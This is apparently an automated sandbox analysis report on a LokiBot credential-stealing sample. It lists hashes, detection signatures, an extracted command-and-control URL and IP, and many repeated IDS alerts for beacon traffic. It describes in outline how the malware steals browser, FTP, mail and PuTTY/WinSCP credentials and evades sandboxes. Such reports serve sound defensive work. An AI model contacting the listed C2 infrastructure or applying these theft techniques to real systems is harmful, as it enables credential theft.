Analysis Report SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.20770

Overview

General Information

Sample Name: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.20770 (renamed file extension from 20770 to exe)
Analysis ID: 325825
MD5: 2aaa15e28835feda9a2e223d82db2126
SHA1: 2c4ace288456010a2717597b192827cd9f7ec771
SHA256: e385b8f5946a41469f49fad4aaeb98e510e79afd0ba6c8546c7b6548da61b8e6
Tags: Loki

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Lokibot
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Startup

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Lokibot

{"c2:": "http://nevomw.com/candy/five/fre.php"}

Yara Overview

PCAP (Network Traffic)

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security | |

Memory Dumps

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000001.00000003.480912778.0000000000E84000.00000004.00000001.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security | |
| 00000001.00000002.607799523.0000000000E68000.00000004.00000020.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security | |
| 00000001.00000003.476321253.0000000000E84000.00000004.00000001.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security | |
| 00000001.00000003.452594690.0000000000E7C000.00000004.00000001.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security | |
| 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |

Unpacked PEs

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security | |
| 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security | |
| 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack | Loki_1 | Loki Payload | kevoreilly | 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW; 0x153fc:$a2: last_compatible_version |
| 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group | 0x13bff:$des3: 68 03 66 00 00; 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X; 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00 |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.4852.1.memstr, Malware Configuration Extractor: Lokibot {"c2:": "http://nevomw.com/candy/five/fre.php"}
Multi AV Scanner detection for domain / URL
Source: nevomw.com, Virustotal: Detection: 10%
Source: http://nevomw.com/candy/five/fre.php, Virustotal: Detection: 12%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Virustotal: Detection: 39%
Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, ReversingLabs: Detection: 20%
Machine Learning detection for sample
Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 1_2_00403D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Code function: 4x nop then jmp 07AC5FADh, 0_2_07AC5F28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Code function: 4x nop then jmp 07AC5FADh, 0_2_07AC5F38

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49757 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49757 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49757
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49758
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49759
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49760
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49761
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49762
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49763
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49764
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49765
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49766
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49767
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49768
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49769
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49770
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49771
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49772
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49773
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49774
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49775
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49776
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49778
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49779
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49781
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49783
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49787
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49789
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49791
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49793
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49795
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49797
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49799
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49800
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49802
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49804
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49805
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49806 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49806 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49806 -> 45.144.3.234:80
